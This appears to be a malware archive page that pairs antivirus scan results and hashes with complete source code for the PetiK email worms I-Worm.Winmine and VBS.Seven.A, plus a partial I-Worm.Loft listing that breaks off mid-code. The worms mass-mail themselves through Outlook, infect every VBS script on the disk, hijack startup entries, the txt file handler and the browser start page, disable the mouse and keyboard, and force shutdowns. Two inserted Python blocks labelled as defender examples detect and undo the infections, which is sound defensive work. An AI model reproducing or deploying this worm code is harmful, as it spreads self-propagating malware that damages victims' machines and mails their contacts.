Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.8704
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.09
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f
Avast 4.8.1335.0 2009.05.15 Win32:Gamma
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.C@mm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09
Comodo 1157 2009.05.08 Worm.Win32.Petik.C
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania
F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm
GData 19 2009.05.16 Win32.Petik.C@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.09
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm
NOD32 4080 2009.05.15 Win32/Petik.C
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 DDoS/Petik.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g
Sophos 4.41.0 2009.05.16 W32/Gamma
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D
VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A

Additional information
File size: 8704 bytes
MD5...: 997ae169da2f57e7e48e6862eb70223a
SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1
comment #
Name : I-Worm.Winmine
Author : PetiK
Date : June 12th - June 15th
Size : 6656 bytes

Action : Check if the file is run from the SYSTEM folder. If so, it creates a file with
the name "C:\ENVOIE_VBS.vbs" to spread with Outlook :
Subject : Is the work so hard ??
Body : Relax you with the last version of <Winmine>.
Attached : WINMINE.EXE
It changes the start page of Internet Explorer to
"http://perso.libertysurf.fr/dacruz/mayaindex.html".
If the current day is the 15th, it displays a message and swaps the mouse buttons.
After five minutes, the worm shuts the computer down.

Otherwise, it copies itself to the SYSTEM folder, alters the load= line in the WIN.INI
file so that it runs when the computer starts, and displays a message box.
#
.586p
.model flat
.code

callx macro a
extrn a:proc
call a
endm

DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetSystemDirectoryA
push offset Copie
push offset szCopie
callx lstrcat

push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz SEND
COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA

WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
push offset Winini
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
push offset load
push offset windows
callx WritePrivateProfileStringA

MESSAGE:push 1040h
push offset TITRE
push offset TEXTE
push 00h
callx MessageBoxA
jmp FIN
SEND: push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset vbssend
callx CreateFileA
cmp eax,-1
je GO
mov [FileHandle],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
GO: push 01h
push offset onyva
callx WinExec

DLL: push offset dllName
callx LoadLibraryA
test eax,eax
jz DATE
mov hdll,eax
push offset FunctionName
push hdll
callx GetProcAddress
test eax,eax
jz DATE
mov setvalue,eax
REG: push 08h
push offset start_page
push 01h
push offset start_key
push offset main_s
push HKEY_CURRENT_USER
call [setvalue]
FINDLL: push [hdll]
callx FreeLibrary

DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
callx MessageBoxA
push 01h
callx SwapMouseButton
push 60 * 5 * 1000
callx Sleep
push EWX_SHUTDOWN
callx ExitWindowsEx

FIN: push 00h
callx ExitProcess

.data
szCopie db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FileHandle dd ?
octets dd ?
hdll dd ?
setvalue dd ?

Copie db "\WINMINE.EXE",00h
vbssend db "C:\ENVOIE_VBS.vbs",00h
onyva db "wscript C:\ENVOIE_VBS.vbs",00h
Winini db "\\WIN.INI",00h
load db "load",00h
windows db "windows",00h
TITRE db "Winmine - Microsoft Corporation (R)",00h
TEXTE db "The last update of the game ""Winmine"" written by Microsoft Corporation",00h
TITRE2 db "I-Worm.Winmine",00h
TEXTE2 db "By PetiK (c)2001",00h
main_s db "Software\Microsoft\Internet Explorer\Main",00h
start_key db "Start Page",00h
start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h
dllName db "SHLWAPI.dll",00h
FunctionName db "SHSetValueA",00h
wormname db "I-Worm.Winmine by PetiK",00h

vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set A=CreateObject("Outlook.Application")',0dh,0ah
db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah
db 'For Each C In B.AddressLists',0dh,0ah
db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For D=1 To C.AddressEntries.count',0dh,0ah
db 'Set E=C.AddressEntries(D)',0dh,0ah
db 'Set F=A.CreateItem(0)',0dh,0ah
db 'F.To=E.Address',0dh,0ah
db 'F.Subject="Is the work so hard ??"',0dh,0ah
db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah
db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah
db 'F.DeleteAfterSubmit=True',0dh,0ah
db 'If F.To <> "" Then',0dh,0ah
db 'F.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',00h
VBSTAILLE equ $-vbsd

CREATE_NEW equ 00000001h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_CURRENT_USER equ 80000001h
EWX_SHUTDOWN equ 00000001h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

end DEBUT
end
File Winmine.exe received on 05.10.2009 23:52:01 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.10 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.09 Win32/Petik.worm.6656
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.AV.02
Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.10 W32/Malware!cc55
Avast 4.8.1335.0 2009.05.10 Win32:Petik-Winmine
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.10 Generic.Malware.Msp!.4B5A9B45
CAT-QuickHeal 10.00 2009.05.09 -
ClamAV 0.94.1 2009.05.10 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.B
DrWeb 5.0.0.12182 2009.05.10 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 Win32/Petik.6656.C
F-Prot 4.4.4.56 2009.05.10 W32/Malware!cc55
F-Secure 8.0.14470.0 2009.05.09 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.10 W32/Petik!worm
GData 19 2009.05.10 Generic.Malware.Msp!.4B5A9B45
Ikarus T3.1.1.49.0 2009.05.10 Email-Worm.Win32.Petik
K7AntiVirus 7.10.729 2009.05.08 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.10 Email-Worm.Win32.Petik
McAfee 5611 2009.05.10 W32/PetTick@MM
McAfee+Artemis 5611 2009.05.10 -
McAfee-GW-Edition 6.7.6 2009.05.10 Worm.Petik.AV.02
Microsoft 1.4602 2009.05.10 Worm:Win32/Pet_tik.G@mm
NOD32 4063 2009.05.08 Win32/Petik.B
Norman 6.01.05 2009.05.08 W32/Pet_Tick.6656.C
nProtect 2009.1.8.0 2009.05.10 Worm/W32.Petik.6656
Panda 10.0.0.14 2009.05.10 W32/Petik
PCTools 4.4.2.0 2009.05.07 I-Worm.Petik.H
Prevx 3.0 2009.05.10 Medium Risk Malware
Rising 21.28.62.00 2009.05.10 Trojan.WINMINE
Sophos 4.41.0 2009.05.10 W32/Winmine
Sunbelt 3.2.1858.2 2009.05.09 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.10 -
TheHacker 6.3.4.1.324 2009.05.09 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.08 WORM_MINEUP.A
VBA32 3.12.10.4 2009.05.09 Win32.Worm.Petik.8192
ViRobot 2009.5.9.1727 2009.05.09 -
VirusBuster 4.6.5.0 2009.05.10 I-Worm.Petik.H

Additional information
File size: 6656 bytes
MD5...: 23f6db768eacfa01a352a657acb26c9b
SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153
' Name : VBS.Seven.A
' Author : PetiK
' Date : June 16th 2001
' Size : 3626 bytes
' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs
' and \WINDOWS\TEMP\Lust.vbs. It adds values in the Run key (Envy) and in the
' RunServices key (Lust). When the current day is the 1st, 15th or 30th, it adds a
' value in the Run key of HKCU (Anger=rundll32 mouse,disable), which disables
' the mouse at each start. When the current day is the 12th or 28th, it displays a
' message box and closes Windows when the user clicks "OK".
' When the day is the 14th, it displays another message; when the user clicks "OK",
' the worm disables the keyboard.
' When the day is the 5th or 17th, it changes some values in the registry: when the
' user wants to open a TXT file, "\WINDOWS\Seven.vbs" starts, and the VBS icon is
' replaced by the TXT icon.
' It then infects all VBS files it finds on the disk, adding some lines
' at the end of each file to run \WINDOWS\Seven.vbs when the file is run.
' The worm uses Outlook to spread too :
' Subject : What is the seven sins ??
' Body : Look at this file and learn them.
' Attached : Seven.vbs

'VBS.Seven.A
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)

SEVEN()

Sub SEVEN()
Set org=fso.GetFile(WScript.ScriptFullname)
org.Copy(win&"\Seven.vbs")
org.Copy(sys&"\Envy.vbs")
org.Copy(tmp&"\Lust.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust")
ws.RegWrite run,sys&"\Envy.vbs"
ws.RegWrite runs,tmp&"\Lust.vbs"
First()
Second()
Third()
Disk()
Send()
End Sub

Sub First()
If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then
run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger")
ws.RegWrite run2,"rundll32 mouse,disable"
End If
End Sub

Sub Second()
If Day(Now)=12 or Day(Now)=28 Then
MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven"
ws.Run "rundll32.exe user.exe,exitwindows"
End If
If Day(Now)=14 Then
MsgBox "The keyboard is on strike !",vbInformation,"Seven"
ws.Run "rundll32 keyboard,disable"
End If
End Sub

Sub Third()
If Day(Now)=5 or Day(Now)=17 Then
bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then
txt=ws.RegRead("HKCR\txtfile\shell\open\command\")
ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt
ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs"
icot=ws.RegRead("HKCR\txtfile\DefaultIcon\")
icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot
Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
end if
End If
End Sub

Sub Disk
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
end If
Next
End Sub
Sub infect(dossier)
Set f=fso.GetFolder(dossier)
Set fc=f.Files
For each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
If (ext="vbs") Then
Set cot=fso.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS.Seven.A" then
cot.Close
Set cot=fso.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=fso.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS.Seven.A"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine "Set w=CreateObject(""WScript.Shell"")"
inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")"
inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs"""
inf.Close
End If
End If
Next
End Sub
Sub list(dossier)
Set f=fso.GetFolder(dossier)
Set sf=f.SubFolders
For each f1 in sf
infect(f1.path)
list(f1.path)
Next
End Sub

Sub Send()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="What is the seven sins ??"
F.Body="Look at this file and learn them."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
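The reverse of the infect() routine above, as an added defender's example (not code from the archive): a scanner that recognises the marker line and the three appended launcher lines and reconstructs the original script. The sample scripts are constructed, and `clean_file` / `scan_tree` are hypothetical helper names.

```python
"""Detect and undo the VBS.Seven.A host-file modification described in the header above.

Added example, not code from the archive. The marker line and the three launcher
lines are copied from the listing's infect() routine; everything else is constructed.
"""
from dataclasses import dataclass
from pathlib import Path
from typing import Iterator, Optional, Tuple

SEVEN_MARKER = "'VBS.Seven.A"
# What infect() appends after the original script body, in this order.
SEVEN_LAUNCHER = (
    'Set w=CreateObject("WScript.Shell")',
    'Set f=CreateObject("Scripting.FileSystemObject")',
    'w.run f.GetSpecialFolder(0)&"\\Seven.vbs"',
)


@dataclass
class ScanResult:
    infected: bool
    reason: str
    cleaned: Optional[str]  # recovered original text, when the full pattern is present


def scan_vbs(text: str) -> ScanResult:
    """Classify one script's text; reconstruct the original when marker and tail agree."""
    lines = text.splitlines(keepends=True)
    has_marker = bool(lines) and lines[0].rstrip("\r\n") == SEVEN_MARKER
    tail = tuple(line.rstrip("\r\n") for line in lines[-3:])
    has_tail = len(lines) >= 3 and tail == SEVEN_LAUNCHER
    if not has_marker and not has_tail:
        return ScanResult(False, "clean", None)
    if not (has_marker and has_tail):
        # Truncated or hand-edited file: report it, but do not guess at the original.
        return ScanResult(True, "partial Seven.A pattern (marker or launcher only)", None)
    body = "".join(lines[1:-3])
    # infect() wrote the original with Write(), then WriteLine "" added exactly one
    # line ending before the launcher; drop that one, and only that one.
    if body.endswith("\r\n"):
        body = body[:-2]
    elif body.endswith("\n"):
        body = body[:-1]
    return ScanResult(True, "Seven.A marker and launcher tail", body)


def clean_file(path: Path) -> ScanResult:
    """Scan a .vbs file on disk and rewrite it with the original content if recoverable."""
    result = scan_vbs(path.read_text(encoding="latin-1"))
    if result.cleaned is not None:
        path.write_text(result.cleaned, encoding="latin-1")
    return result


def scan_tree(root: Path) -> Iterator[Tuple[Path, ScanResult]]:
    """Walk a folder the way the worm's list()/infect() do, but only read and report."""
    for p in root.rglob("*.vbs"):
        yield p, scan_vbs(p.read_text(encoding="latin-1"))


if __name__ == "__main__":
    # Constructed victim: a one-line script after Seven.A has processed it.
    original = 'MsgBox "hello"\r\n'
    infected = SEVEN_MARKER + "\r\n" + original + "\r\n" + "\r\n".join(SEVEN_LAUNCHER) + "\r\n"
    r = scan_vbs(infected)
    print(r.reason, "->", repr(r.cleaned))  # recovered text equals `original`
```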
File Seven.vbs received on 05.16.2009 19:29:21 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.I
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.S@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.9CAAED1A
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.I
ClamAV 0.94.1 2009.05.16 Worm.Petik.I
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.SillyWorm.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Chism
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.S@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.i
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.I
GData 19 2009.05.16 Generic.ScriptWorm.9CAAED1A
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.i
McAfee 5616 2009.05.15 VBS/Chism
McAfee+Artemis 5616 2009.05.15 VBS/Chism
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.I
Microsoft 1.4602 2009.05.16 Virus:VBS/Chism
NOD32 4080 2009.05.15 VBS/Chism
Norman 6.01.05 2009.05.16 VBS/Chism.A@mm
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.I@mm
Panda 10.0.0.14 2009.05.16 VBS/Petik.I
PCTools 4.4.2.0 2009.05.16 VBS.Seven.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik.i
Sophos 4.41.0 2009.05.16 VBS/Seven-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.I-O
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.i
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Seven.A

Additional information
File size: 3626 bytes
MD5...: 8781b9a791c0c144e97a466486f6ef33
SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec
comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 bytes

Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies itself to this file and alters
the run= line in the WIN.INI file so that it runs at each start. It copies itself to
\WINDOWS\LOFT_STORY.EXE too.
Otherwise, it checks whether the key HKCU\Software\Microsoft\PetiK exists. If it does not, the
worm creates the file "Loft.htm" in the StartUp folder. When the user accepts the
ActiveX of this page, it modifies the start page of Internet Explorer to download the
file ActiveX.vbs.
This file sends various information about the computer to three addresses :
loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a).

It displays a message on the 28th of each month and modifies the Internet Explorer start
page as well as RegisteredOwner and RegisteredOrganization. It checks whether an Internet
connection exists. If not, it loops every five seconds; otherwise it displays a message.
It scans all *.htm* files in the "Temporary Internet Files" folder to find email addresses.
#
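As an added defender's example (not code from the archive) covering the Winmine, Seven and Loft headers above: an audit that checks WIN.INI and a registry snapshot for the persistence entries and marker keys those listings write. The flat registry mapping format and the sample host data are assumptions constructed from the values quoted in the listings.

```python
"""Audit a host for the persistence markers the Winmine, Seven, Loft and Gamma
listings leave behind: WIN.INI run=/load=, Run/RunServices values, the txtfile
handler hijack and the "already infected" marker keys.

Added example, not code from the archive. Inputs are plain text and a flat
{"HIVE\\key\\value name": data} mapping so it runs offline; on a real host you
would fill the mapping from winreg or a `reg export` file. The sample data at
the bottom is constructed from the values quoted in the listings.
"""
import configparser
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (indicator, evidence)

# Value names the listings write under Run/RunServices (Seven: Envy, Lust, Anger;
# Delirious: Delire; Loft's dropped page: "ActiveX 1.0").
WORM_RUN_NAMES = {"envy", "lust", "anger", "delire", "activex 1.0"}
RUN_KEYS = {
    r"hklm\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\runservices",
    r"hkcu\software\microsoft\windows\currentversion\run",
}
# Keys the listings create purely as infection flags (Gamma's VBS, Loft, ActiveX.vbs).
MARKER_KEYS = {r"hklm\software\gamma", r"hkcu\software\microsoft\petik"}
TXT_CMD = r"hkcr\txtfile\shell\open\command"


def audit_win_ini(text: str) -> List[Finding]:
    """run= and load= in [windows] are normally empty; Winmine, Loft and Gamma set them."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, allow_no_value=True)
    cp.read_string(text)
    out: List[Finding] = []
    for key in ("run", "load"):
        val = (cp.get("windows", key, fallback="") or "").strip()
        if val:
            out.append((f"win.ini {key}=", val))
    return out


def audit_registry(reg: Dict[str, str]) -> List[Finding]:
    """Match a flat registry snapshot against the keys and values the listings touch."""
    out: List[Finding] = []
    for full, data in reg.items():
        key, _, name = full.rpartition("\\")  # a trailing "\" means the default value
        k, n, d = key.lower(), name.lower(), str(data).lower()
        if k in RUN_KEYS:
            if n in WORM_RUN_NAMES:
                out.append(("known worm autostart value", f"{full} = {data}"))
            elif d.endswith(".vbs") or "mouse,disable" in d or "keyboard,disable" in d:
                out.append(("suspicious autostart value", f"{full} = {data}"))
        elif k == TXT_CMD and n == "" and "wscript" in d:
            out.append(("txtfile handler hijacked", f"{full} = {data}"))
        elif k == TXT_CMD and n == "pride":
            out.append(("saved original txtfile handler (Seven.A)", f"{full} = {data}"))
        elif k == r"hkcr\vbsfile\defaulticon" and n == "oldicon":
            out.append(("VBS icon swapped for TXT icon (Seven.A)", f"{full} = {data}"))
        elif k in MARKER_KEYS or k.startswith("hkcu\\software\\microsoft\\petik\\"):
            out.append(("infection marker key", full))
        elif k == r"hkcu\software\microsoft\internet explorer\main" and n == "start page" and d.endswith(".vbs"):
            out.append(("IE start page points at a script (Loft.htm)", f"{full} = {data}"))
    return out


def audit_host(win_ini_text: str, reg: Dict[str, str]) -> List[Finding]:
    return audit_win_ini(win_ini_text) + audit_registry(reg)


# Constructed snapshot of a host after Winmine, Loft, Seven.A and Gamma have run,
# plus one benign Run value (SystemTray) to show it is not flagged.
SAMPLE_WIN_INI = """; constructed sample
[windows]
load=C:\\WINDOWS\\SYSTEM\\WINMINE.EXE
run=C:\\WINDOWS\\SYSTEM\\LOFT.EXE
[extensions]
txt=notepad.exe ^.txt
"""
SAMPLE_REGISTRY = {
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Envy": "C:\\WINDOWS\\SYSTEM\\Envy.vbs",
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Lust": "C:\\WINDOWS\\TEMP\\Lust.vbs",
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Anger": "rundll32 mouse,disable",
    "HKCR\\txtfile\\shell\\open\\command\\": "wscript C:\\WINDOWS\\Seven.vbs",
    "HKCR\\txtfile\\shell\\open\\command\\Pride": "C:\\WINDOWS\\NOTEPAD.EXE %1",
    "HKLM\\Software\\Gamma\\": "OK",
    "HKCU\\Software\\Microsoft\\PetiK\\LoftInfo": "OK",
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTray": "SysTray.Exe",
}

if __name__ == "__main__":
    for indicator, evidence in audit_host(SAMPLE_WIN_INI, SAMPLE_REGISTRY):
        print(f"{indicator:45} {evidence}")
```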

.586p
.model flat
.code

callx macro a
extrn a:proc
call a
endm

include useful.inc

DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\LOFT.EXE"
push offset szCopie
callx lstrcat

push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\LOFT_STORY.EXE"
push offset szCopieb
callx lstrcat

push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz C_PTK

COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopieb
push offset szOrig
callx CopyFileA

WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA

MESSAGE:push 1040h
@pushsz "Loft Story"
@pushsz "I'm fucking the Loft Story"
push 00h
callx MessageBoxA
jmp FIN

C_PTK: push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h
push 00h
@pushsz "Software\Microsoft\PetiK"
push HKEY_CURRENT_USER
callx RegCreateKeyExA
cmp [regDisp],2
je DATE
push [regResu]
callx RegCloseKey

STA_UP: push offset RegHandle
push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset BufferSize
push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Startup"
push RegHandle
callx RegQueryValueExA

push [RegHandle]
callx RegCloseKey

CR_HTM: @pushsz "\Loft.htm"
push offset Buffer
call lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset Buffer
callx CreateFileA
mov [FileHandle],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
jmp DLL

DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],28
jne DLL
SHSET: @pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz DLL
mov hdll2,eax
@pushsz "SHSetValueA"
push hdll2
callx GetProcAddress
test eax,eax
jz DLL
mov setvalue,eax
WEB: push 08h
@pushsz "http://www.loftstory.fr"
push 01h
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
push HKEY_CURRENT_USER
call [setvalue]
push 08h
@pushsz "LoftStory"
push 01h
@pushsz "RegisteredOrganization"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push HKEY_LOCAL_MACHINE
call [setvalue]
push 08h
@pushsz "Aziz, Kenza, Loanna, etc..."
push 01h
@pushsz "RegisteredOwner"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
push HKEY_LOCAL_MACHINE
call [setvalue]
push [hdll2]
callx FreeLibrary
push 40h
@pushsz "I-Worm.LoftStory"
@pushsz "New Worm Internet coded by PetiK (c)2001"
push 00h
callx MessageBoxA

DLL: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov hdll,eax
@pushsz "InternetGetConnectedState"
push hdll
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET
DODO: push 5000
callx Sleep
NET: push 00h
push offset Temp
call [netcheck]
dec eax
jnz DODO
NET_OK: push 40h
@pushsz "Loft Story"
@pushsz "Welcome to Internet !"
push 00h
callx MessageBoxA
FINDLL: push [hdll]
callx FreeLibrary

REG: push offset RegHandle
push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset BufferSize
push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Cache"
push RegHandle
